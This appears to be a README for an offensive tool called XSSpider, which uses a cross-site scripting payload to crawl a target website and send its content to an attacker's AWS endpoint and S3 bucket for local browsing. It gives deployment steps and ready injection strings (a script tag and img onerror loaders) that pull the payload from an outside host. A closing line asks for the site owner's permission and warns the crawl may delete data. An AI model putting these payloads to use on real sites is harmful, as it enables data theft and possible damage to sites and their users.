This tool features a Javascript-based XSS payload used to crawl and exfiltrate website content. Data is stored in S3, and can be fully recreated and navigated in the attacker's local environment.
Create an AWS account and configure your credentials for the AWS CLI
NPM is required to run the Serverless Framework, install it Here.
npm install -g serverless
npm update -g serverless
npm install --save serverless-s3-sync
Python 3 is required for the local server to run. You can download it Here
The values for service
, s3Bucket_Payload
, and s3Bucket_Server
will need to be changed to a unique name for your environment
service: {{Your_Service_Name_Here}}
custom:
s3Bucket_Payload: {{S3_Payload_Bucket}}
s3Bucket_Server: {{S3_Server_Bucket}}
Using the value of s3Bucket_Server
you entered in the serverless.yml file, update the value of bucket_name
import json,boto3,time,base64,hashlib,re
from urllib.parse import unquote
s3 = boto3.client('s3')
bucket_name = '{{S3_Server_Bucket}}'
Using the value of s3Bucket_Payload
you entered in the serverless.yml file, update the value of spider_URL
var spider_URL = 'https://{{S3_Payload_Bucket}}.s3.amazonaws.com/spider.js';
Running the following command in console, Serverless will package up the resources and deploy them to your AWS environment
serverless deploy
Output:
Serverless: Stack update finished...
Service Information
service: {{Service_Name}}
stage: dev
region: us-east-1
stack: {{Service_Name}}-dev
resources: 16
api keys:
None
endpoints:
POST - https://{{abcd1234}}.execute-api.us-east-1.amazonaws.com/dev/storeData
functions:
storeData: {{Service_Name}}-dev-storeData
Referencing the output from the previous step, update the storeData_URL
variable
var storeData_URL = 'https://{{abcd1234}}.execute-api.us-east-1.amazonaws.com/dev/storeData';
$(document).ready(function() {
base_url = window.location.host;
ProcessHTML($.parseHTML($("html").html(), true));
})
serverless deploy
You are now ready to use XSSpider!
Running this code in the console of your XSSpider demo site will verify that everything was setup correctly.
$.getScript('https://{{S3_Payload_Bucket}}.s3.amazonaws.com/spider.js')
<script src="https://{{S3_Payload_Bucket}}.s3.amazonaws.com/payload.js"></script>
<!-- jQuery is defined -->
<img/src=''/onerror="$.getScript('https://{{S3_Payload_Bucket}}.s3.amazonaws.com/payload.js')">
<!-- jQuery is not defined -->
<img src='' onerror="javascript:var script=document.createElement('script');script.src='https://{{S3_Payload_Bucket}}.s3.amazonaws.com/payload.js';document.head.appendChild(script);">
Copy the S3 Bucket for your target site to the server directory
cd ./server
aws s3 cp s3://{{S3_Server_Bucket}}/{{Target_Site}} . --recursive
python3 server.py 8888
Navigate to http://localhost:8888 to view the site
For those who don't want to use AWS and want to skip all the setup, a self-hosted Docker version of XSSpider is currently in development
XSSpider will enumerate and interact with every link it comes accross. If the target site has not been developed properly, it could very well lead to deletion of data or other damaging effects. There is a blacklist of text to avoid, but does not gaurantee anything. Do no use without explicit permission from the target site owner.